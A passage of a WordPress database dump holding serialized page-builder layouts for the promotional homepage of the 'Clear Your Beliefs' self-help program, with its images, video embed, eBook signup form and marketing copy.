(1144, 1626, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -108px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:764:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1569:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 18px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: 10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul style="margin-left: 18px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2637:"<div id="divStroke">\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I…\n- What belief…\n- How can I…\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1145, 1627, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -108px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:764:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1569:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 18px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: 10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul style="margin-left: 18px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2738:"<div id="divStroke">\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my belief so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1146, 1628, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -108px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:781:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1569:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 18px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: 10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul style="margin-left: 18px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2738:"<div id="divStroke">\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my belief so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 